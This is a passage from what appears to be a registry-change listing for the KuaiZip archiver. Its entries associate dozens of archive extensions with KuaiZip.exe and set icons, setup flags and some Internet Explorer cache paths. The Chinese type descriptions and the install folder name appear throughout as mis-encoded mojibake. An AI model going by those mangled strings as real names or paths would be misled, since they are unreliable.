"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 006 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.wim]
"(Default)" = "NoAssociate.KZ"

[HKCR\.075]
"(Default)" = "KuaiZip.075"

[HKCR\KuaiZip.078\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.cab\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.097]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 097 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\KuaiZip.098\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.02]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.085]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.072]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.bz2\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.038]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 038 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.04\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.013]
"(Default)" = "KuaiZip.013"

[HKCR\.072]
"(Default)" = "KuaiZip.072"

[HKCR\KuaiZip.084]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 084 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.z\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.019]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.084]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.052]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 052 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.048]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 048 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.078\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.008]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 008 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.069\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.099]
"(Default)" = "KuaiZip.099"

[HKCR\KuaiZip.060\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.042\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.014]
"(Default)" = "KuaiZip.014"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.005]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.083]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.088]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.067\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.gz]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ GZ Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.074]
"(Default)" = "KuaiZip.074"

[HKCR\KuaiZip_FileAsso.Origin\.077]
"(Default)" = "NoAssociate.KZ"

[HKCR\.06]
"(Default)" = "KuaiZip.06"

[HKCR\KuaiZip_FileAsso.Origin\.058]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.gz]
"(Default)" = ""

[HKCU\Software\KuaiZip\KuaiZip\Setup\.006]
"set" = "1"

[HKCR\.023]
"(Default)" = "KuaiZip.023"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\KuaiZip_FileAsso.Origin\.tar]
"(Default)" = ""

[HKCR\KuaiZip.089]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 089 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.cab]
"(Default)" = "CLSID\{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.090]
"set" = "1"

[HKCR\KuaiZip.013\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.076]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.05\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.012\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.055]
"(Default)" = "KuaiZip.055"

[HKCR\KuaiZip.074\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.074]
"(Default)" = "NoAssociate.KZ"

[HKCR\.073]
"(Default)" = "KuaiZip.073"

[HKCR\KuaiZip_FileAsso.Origin\.7z]
"(Default)" = ""

[HKCR\KuaiZip.005\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.016]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 016 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.092]
"set" = "1"

[HKCR\.058]
"(Default)" = "KuaiZip.058"

[HKCR\KuaiZip.093]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 093 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.015\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.001\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.056\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.bz2]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ BZ2 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.026]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.kz\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.027]
"(Default)" = "KuaiZip.027"

[HKCR\KuaiZip.gz\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.005]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 005 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.037]
"(Default)" = "KuaiZip.037"

[HKCR\KuaiZip_FileAsso.Origin\.080]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.061\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.093\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.080]
"(Default)" = "KuaiZip.080"

[HKCR\KuaiZip.082\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.lzh]
"(Default)" = "KuaiZip.lzh"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.074]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.011]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.010]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.gzip]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.01]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.046]
"(Default)" = "NoAssociate.KZ"

[HKCR\.050]
"(Default)" = "KuaiZip.050"

[HKCR\KuaiZip.067]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 067 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.054]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.029]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.lzh]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ LZH Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.arj]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.030]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.024]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.06\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.066\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.080]
"set" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\KuaiZip.054\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.040]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.092\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.032]
"(Default)" = "NoAssociate.KZ"

[HKCR\.059]
"(Default)" = "KuaiZip.059"

[HKCR\KuaiZip.08\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.093\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.053\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.07]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.003\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.044]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.001\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.arj\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.030\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.096]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.043]
"set" = "1"

[HKCR\KuaiZip.004]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 004 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.077\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.091]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.035]
"set" = "1"

[HKCR\KuaiZip.gzip\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.cab]
"set" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\KuaiZip.030\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.027]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.093]
"set" = "1"

[HKCR\KuaiZip.032]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 032 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.091]
"(Default)" = "KuaiZip.091"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\KuaiZip_FileAsso.Origin\.08]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.095\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.048]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.jar]
"set" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\.096]
"(Default)" = "KuaiZip.096"

[HKCR\KuaiZip.055]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 055 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.038]
"(Default)" = "KuaiZip.038"

[HKCR\KuaiZip_FileAsso.Origin\.014]
"(Default)" = "NoAssociate.KZ"

[HKCR\.062]
"(Default)" = "KuaiZip.062"

[HKCR\KuaiZip_FileAsso.Origin\.060]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.arj]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ ARJ Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.06]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.063\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.01]
"(Default)" = "KuaiZip.01"

[HKCR\KuaiZip.tar\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.kz]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.032]
"set" = "1"

[HKCR\.03]
"(Default)" = "KuaiZip.03"

[HKCR\KuaiZip.058\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.071]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 071 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.023\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.066]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.007\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.037]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.zip]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ ZIP Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.086]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.091\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.jar]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ JAR Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.080\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tar]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ TAR Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.wim]
"(Default)" = "KuaiZip.wim"

[HKCR\KuaiZip.032\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.086\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.031\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.08]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.062]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\TreePanel]
"Hiden" = "0"

[HKCR\KuaiZip.033\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.mou]
"(Default)" = "KuaiZip.mou"

[HKCR\KuaiZip.051\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.062]
"set" = "1"

[HKCR\.088]
"(Default)" = "KuaiZip.088"

[HKCR\KuaiZip.rar\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.07\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.014\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.073]
"set" = "1"

[HKCR\KuaiZip.7z\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,3"

[HKCR\KuaiZip.098\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.070\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.075]
"(Default)" = "NoAssociate.KZ"

[HKCR\.044]
"(Default)" = "KuaiZip.044"

[HKCR\KuaiZip.014\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.072]
"set" = "1"

[HKCR\KuaiZip.039\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.gz]
"(Default)" = "KuaiZip.gz"

[HKCR\KuaiZip.050\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.098]
"set" = "1"

[HKCR\KuaiZip.088]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 088 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.057]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 057 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.061]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 061 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.029]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.065]
"set" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\.08]
"(Default)" = "KuaiZip.08"

[HKCR\.033]
"(Default)" = "KuaiZip.033"

[HKCR\.tgz]
"(Default)" = "KuaiZip.tgz"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\KuaiZip.rpm\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.078]
"(Default)" = "KuaiZip.078"

[HKCR\KuaiZip.091]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 091 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.068\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.09\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.049]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.008]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.05\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.065]
"(Default)" = "KuaiZip.065"

[HKCR\.063]
"(Default)" = "KuaiZip.063"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.079]
"set" = "1"

[HKCR\KuaiZip.092]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 092 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.040]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 040 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.rar]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.tar\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.029]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 029 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.rar]
"set" = "1"

[HKCR\KuaiZip.080]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 080 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.024\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.jar]
"(Default)" = "jarfile"

[HKCR\KuaiZip.076\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.096]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.013]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.044\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.022]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.097]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.027]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.04]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.035]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 035 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.081\DefaultIcon]
